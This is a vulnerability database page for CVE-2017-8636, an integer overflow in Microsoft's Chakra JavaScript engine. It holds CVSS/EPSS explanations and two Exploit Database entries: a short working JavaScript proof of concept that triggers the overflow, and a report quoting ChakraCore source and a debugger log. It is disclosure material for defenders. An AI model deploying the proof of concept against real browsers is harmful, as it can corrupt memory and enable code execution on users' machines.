CVE-2017-8636: Details

CVE-2017-8636

CVSS v3 score: 7.5 (High)
Type: Overflow
EPSS: 88.74%
Attack vector: Network
Published: 2017-08-08 21:00 +00:00
Last modified: 2024-09-17 00:56 +00:00

CVE description

Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.

CVE information

Related weaknesses

CWE-ID: CWE-119
Weakness name: Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

CVSS v3.0: score 7.5, severity HIGH, vector CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

CVSS v2: score 7.6, vector AV:N/AC:H/Au:N/C:C/I:C/A:C

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare a CVE's EPSS score against those of other CVEs.

Exploit information

Exploit Database EDB-ID: 42478

Publication date: 2017-08-16 22:00 +00:00
Author: Google Security Research
EDB verified: Yes

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315

The bytecode generator uses the "EmitNew" function to handle new operators. Here's how the function checks for integer overflow.

void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    ...
}

"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.

PoC:
-->

let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
Exploit Database EDB-ID: 42466

Publication date: 2017-08-16 22:00 +00:00
Author: Huang Anwen
EDB verified: No

<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

There is an overflow when constructing a new object with arguments which has 0xffff elements in Chakra! This issue can be reproduced steadily in up-to-date Edge in Win10 WIP.

//ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF
    argCount++; // include "this" //overflow!!!! argCount==0

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }

    byteCodeGenerator->StartStatement(pnode);

    // Start call, allocate out param space
    funcInfo->StartRecordingOutArgs(argCount);

    // Assign the call target operand(s), putting them into expression temps if necessary to protect
    // them from side-effects.
    if (fSideEffectArgs)
    {
        SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
    }

    if (pnode->sxCall.pnodeTarget->nop == knopSuper)
    {
        EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);
    }

    Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);

    if (pnode->sxCall.pnodeArgs == nullptr)
    {
        funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
        Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)
                         && CallTargetIsArray(pnode->sxCall.pnodeTarget)) ?
            Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;
        Assert(argCount == 1);

        Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),
            pnode->sxCall.pnodeTarget->location, argCount, callSiteId);
    }
    else
    {
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        uint32 actualArgCount = 0;

        if (IsCallOfConstants(pnode))
        {
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
            actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);
        }
        else
        {
            Js::OpCode op;
            if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;
            }
            else
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;
            }

            Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);

            Js::AuxArray<uint32> *spreadIndices = nullptr;
            actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister,
                Js::Constants::NoRegister, false, true, byteCodeGenerator, funcInfo, callSiteId,
                pnode->sxCall.spreadArgCount, &spreadIndices);
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);

            if (pnode->sxCall.spreadArgCount > 0)
            {
                Assert(spreadIndices != nullptr);
                uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);
                uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;
                byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
                    (uint16)actualArgCount, Js::CallIExtended_SpreadArgs, spreadIndices, spreadIndicesSize, callSiteId);
            }
            else
            {
                byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
                    (uint16)actualArgCount, callSiteId);
            }
        }

        Assert(argCount == actualArgCount);
    }

    // End call, pop param space
    funcInfo->EndRecordingOutArgs(argCount);
    return;
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)
{
    Assert(m_outParams + outRegisterID < m_outSp);
    m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
    // Support for simulating partially initialized interpreter stack frame.
    InterpreterThunkStackCountTracker tracker;

    if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&
        CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())
    {
        switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))
        {
        case 0:
            DebugBreak();
            break;
        case 1:
            Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);
            break;
        default:
            DebugBreak();
        }
    }
#endif

    ScriptContext* functionScriptContext = function->GetScriptContext();
    ThreadContext * threadContext = functionScriptContext->GetThreadContext();
    Assert(!threadContext->IsDisableImplicitException());
    functionScriptContext->VerifyAlive(!function->IsExternal());
    Assert(threadContext->IsScriptActive());
    Assert(threadContext->IsInScript());

    FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
    if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch
    {
        if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())
        {
            Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode
        }
        else
        {
            Throw::FatalInternalError();
        }
    }
#endif
if (executeFunction->GetInterpretedCount() == 0) { executeFunction->TraceInterpreterExecutionMode(); } class AutoRestore { private: ThreadContext *const threadContext; const uint8 savedLoopDepth; public: AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction) : threadContext(threadContext), savedLoopDepth(threadContext->LoopDepth()) { if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction()) { executeFunction->SetWasCalledFromLoop(); } } ~AutoRestore() { threadContext->SetLoopDepth(savedLoopDepth); } } autoRestore(threadContext, executeFunction); #if ENABLE_PROFILE_INFO DynamicProfileInfo * dynamicProfileInfo = nullptr; const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter || (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction)); if (doProfile) { #if !DYNAMIC_INTERPRETER_THUNK executeFunction->EnsureDynamicProfileInfo(); #endif dynamicProfileInfo = executeFunction->GetDynamicProfileInfo(); threadContext->ClearImplicitCallFlags(); } #else const bool doProfile = false; #endif executeFunction->IncreaseInterpretedCount(); #ifdef BGJIT_STATS functionScriptContext->interpretedCount++; functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount()); #endif AssertMsg(!executeFunction->IsDeferredParseFunction(), "Non-intrinsic functions must provide byte-code to execute"); executeFunction->BeginExecution(); bool fReleaseAlloc = false; InterpreterStackFrame* newInstance = nullptr; Var* allocation = nullptr; if (!isAsmJs && executeFunction->IsCoroutine()) { // If the FunctionBody is a generator then this call is being made by one of the three // generator resuming methods: next(), throw(), or return(). They all pass the generator // object as the first of two arguments. The real user arguments are obtained from the // generator object. 
The second argument is the ResumeYieldData which is only needed // when resuming a generator and so it only used here if a frame already exists on the // generator object. AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer"); JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]); newInstance = generator->GetFrame(); if (newInstance != nullptr) { ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]); newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData); // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so // give the InterpreterStackFrame a legit enough stack address to make this comparison work. newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator); } else { // // Allocate a new InterpreterStackFrame instance on the recycler heap. // It will live with the JavascriptGenerator object. // Arguments generatorArgs = generator->GetArguments(); InterpreterStackFrame::Setup setup(function, generatorArgs); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? 
executeFunction->GetLoopHeaderArrayPtr() : nullptr; allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var); AnalysisAssert(allocation); #if DBG // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var); AnalysisAssert(invalidVar); memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); generator->SetFrame(newInstance, varSizeInBytes); } } else { InterpreterStackFrame::Setup setup(function, args); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); // // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack. // DWORD_PTR stackAddr; // If the locals area exceeds a certain limit, allocate it from a private arena rather than // this frame. The current limit is based on an old assert on the number of locals we would allow here. 
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) { ArenaAllocator *tmpAlloc = nullptr; fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc); allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes); stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step) } else { PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes); allocation = (Var*)_alloca(varSizeInBytes); #if DBG memset(allocation, 0xFE, varSizeInBytes); #endif stackAddr = reinterpret_cast<DWORD_PTR>(allocation); } /* * If the function has any loop headers, we allocate an array for the loop headers wrappers, and * reference the wrappers in the array. We then push the pointer to the array onto the stack itself. * We do this so that while the function is being interpreted, we don't want the jitted loop * bodies to be collected, even if the loop body isn't being executed. The loop body will * get collected when the function has been JITted, and when the function exits the interpreter. * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but * it's cheaper to just copy them all into the recycler array rather than just the ones that * have been jitted. 
*/ Var loopHeaderArray = nullptr; if (executeFunction->GetHasAllocatedLoopHeaders()) { // Loop header array is recycler allocated, so we push it on the stack // When we scan the stack, we'll recognize it as a recycler allocated // object, and mark it's contents and keep the individual loop header // wrappers alive loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr(); } #if DBG Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject)); memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); } // // Execute the function's byte-code, returning the return-value: // - Mark that the function is current executing and may not be modified. 
// #if ENABLE_TTD TTD::TTDExceptionFramePopper exceptionFramePopper; if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock); threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally); exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function); } #endif Var aReturn = nullptr; { if (!isAsmJs && executeFunction->IsInDebugMode()) { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->DebugProcess(); #else aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } else { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->Process(); #else aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } } executeFunction->EndExecution(); #if ENABLE_TTD if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { exceptionFramePopper.PopInfo(); threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn); } #endif if (fReleaseAlloc) { functionScriptContext->ReleaseInterpreterArena(); } #if ENABLE_PROFILE_INFO if (doProfile) { dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags()); } #endif if (isAsmJs) { return newInstance; } return aReturn; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. 
*** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\Windows\System32\combase.dll ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffe`98900000 00007ffe`98960000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\Windows\System32\sechost.dll ModLoad: 00007ffe`96080000 00007ffe`96306000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\Windows\System32\shcore.dll ModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 
C:\Windows\System32\gdi32full.dll ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\Windows\System32\USER32.dll ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\Windows\System32\win32u.dll ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\Windows\System32\profapi.dll ModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\Windows\System32\NSI.dll ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\Windows\System32\ole32.dll ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 
00007ffe`80f50000 00007ffe`8173a000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffe`98590000 00007ffe`98696000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffe`98500000 00007ffe`98582000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\Windows\System32\msctf.dll ModLoad: 00007ffe`98700000 00007ffe`98802000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\Windows\SYSTEM32\urlmon.dll 
ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffe`99510000 00007ffe`99552000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\Windows\system32\msimtf.dll 